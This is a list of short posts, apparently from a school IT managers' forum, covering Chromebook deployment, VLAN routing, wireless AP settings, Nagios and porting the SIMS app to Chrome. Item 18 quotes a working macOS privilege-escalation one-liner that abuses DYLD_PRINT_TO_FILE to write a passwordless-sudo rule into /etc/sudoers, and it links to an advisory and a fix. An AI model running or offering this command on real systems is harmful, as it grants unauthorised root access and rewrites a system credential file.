  1. Flash isn't an issue because pepperflash is built into chrome and it isn't an NPAPI plugin. With Java et al we've used the same strategy as we did with OHP's: find another resource.
  2. Yes. it went without a hitch to 7.07. AP's a are mix of older 320's and 832's. Check the compatibility lists for your AP's
  3. From what I gather it is only worth doing if you don't have 802.11x on the network - which is a better solution IMO.
  4. you won't break anything. You'll need to learn how to create VLAN's, just make sure they are not attached to critical networks. Its a more real life scenario - managing your networks. Sure do it in the comfort of your home via a VPN. When you leave the school, download the image.
  5. Save your money and setup a virtual lab at school. What you are doing is essentially for the schools benefit, and you will learn more when you have vpn's and virtual machines thrown into the mix.
  6. I always say no for these reasons: The network is THE number one thing you need to run; nothing works if the network doesn't. Unmanaged cheap switches have poor chipsets. How do you know if the device is spewing random data onto your network? Poor diagnostics - if something goes wrong you've got very little chance on finding out what. No VLAN's mean you are asking for trouble when it comes to future expansion, VOIP, QOS - nope STP would become a nightmare. Loops ? Random network equipment going offline because someone unplugged it. In short - lots (even a policy of having any) is a quick way to having an unserviceable mess of a network.
  7. You may laugh, but it is the future. All of our current 800 laptops automatically upgrade to the next OS release when it is available. We keep a small proportion of them on Beta to test any errors. When the new update is released, they update automatically by peer to peer. One day Microsoft will follow and get with the times.
  8. Configuration > Devices > AP's > Edit (device) > Wireless Interface Edit (interface) > Transmit Power (EIRP) The Antenna Gain (dBi) is in Configuration > Devices > AP's > Edit (device) > Antenna Properties
  9. It's worth spending time on Nagios. It is very powerful because it is so well supported by open plugins and easy to write scripts for. once configured will do it's job without intervention.
  10. yes great. can you run the APK through arc-welder please and release it on the Chrome store.
  11. Indeed, so write for android and then put it here with all the other apps so I can install into our browsers. https://chrome.google.com/webstore/category/apps
  12. I think Capita are missing the point: if they developed for HTML, and not the device they will open up to more devices and half the development time, which seems to be the issue at the moment. ie if it can be put on Chrome and run wherever chrome runs and deployed centrally. Just for the record, a Chromebook IS a less than £300 tablet nowdays. anyway - does anyone have the APK for android and let me know if it ports via Arc Welder ?
  13. @PhilNeal With regards to a Chrome port; I wonder if you would explain the logic behind not looking at it ? Capita develop the app for W8 phone which has a tiny marketshare and you develop for IOS which is being outsold in the (US) education market by chromebooks. Chrome has had the largest browser marketshare for quite some time. Apps can be installed from the management console and apps that work on the desktop version also work on the chromebook/tablet version. The port from android is pretty straightforward and it opens up a huge market: SIMS teacher app on OSX,Linux,Windows,Chromebooks. It seems to me completely illogical not to do this. why?
  14. Yes we are halfway through this. Last year we ripped out one IT suit, three this year and another to go next year. It works really well - but once we evaluated the management overhead, apps and price of Windows vs ipad vs Chromebooks, the Chromebooks won out. So no direct experience with surface - although I appreciate that it would be more complex to implement. To answer the question about why: I think it comes down to how funding formulas for building works are calculated. I understand that if a school is at capacity and requires new rooms the funding doesn't take into account dedicated spaces if a classroom is empty. ie if an english class vacates their room to use an IT suite the school doesn't get any money to build an extra classroom. This might be for LA schools, and it might be particular to our LA, but that was the general just as I understood it. Suffice to say, the SLT are weighing up the cost of building rooms financed by the school vs the cost of mobile IT. Mobile IT always wins, and if you speak to any of our Chromebook teachers they would most certainly agree.
  15. ^ sucks. We've got to hit a sept deadline to re-image ITSuites. I'll have to try the patch
  16. When is el capitan released ?
  17. Which will be pretty easy to cover tracks if you have root! Doesn't OSX have some sort of SELinux type thing for stuff like this?
  18. echo 'echo "`whoami` ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ==instant root! https://www.sektioneins.de/en/blog/15-07-07-dyld_print_to_file_lpe.html fix: https://github.com/sektioneins/SUIDGuard
  19. ^ to add; whichever way you look syncing docs to cloud can become a massive PITA. As soon as someone logs onto another system it just syncs their data to the local system and add HUGE bandwidth to your cloud provider. We briefly got GAFE syncing from the server, but even that was hit and miss. I'm sure it is possible to do server side correctly but unless you're good with Google's API (python, Go, Java) you'll need to use a third party tool. It's much easier to have a cloud only strategy if you can get a reasonable broadband service in your area. I'm certain it is the way things will go long term, as less people need on-site storage arrays, the more they will go up in cost. At the moment it's debatable for some, in future it will be a no-brainer.
  20. If it is well written, the port to chrome will take 2 min: https://developer.chrome.com/apps/getstarted_arc Useful for us as all staff have chromebooks, and it works on other platforms so means the SIMS client doesn't need to be installed.
  21. It could be quite inefficient if you think about it. You are sending ALL traffic across the interface to smoothwall just so that it can make a routing decision, yet you have a (probably) expensive layer 3 hardware switch which is designed to do this. My advice would be to give every internal vlan an IP address on the interface of the switch and ONLY use the default gateway for where you intend on having a firewall between areas. For example if you VLAN maths and science separately, you probably won't want to firewall them so you make the routing decision at the layer 3 switch by defining the routing table and setting an ip address of the interface. The DMZ is different, because you do want to firewall it - so there you send the traffic to ASA/smoothwall etc) and don't set an interface on the switch.
  22. Open Management Studio, Right click on sims DB, options and change compatibility level to sql 2012 (110)
  23. Any news on the Android version? And will it Port to Chrome ?
  24. It wouldn't surprise me. We tried the original one and nobody used it. I'm sure this is a rebrand.
  25. Remember Google cloud connect? The MSOffice plugin from Google that saves Docs directly to Google cloud.... What happened to that? http://googleappsupdates.blogspot.co.uk/2013/03/cloud-connect-deprecation.html
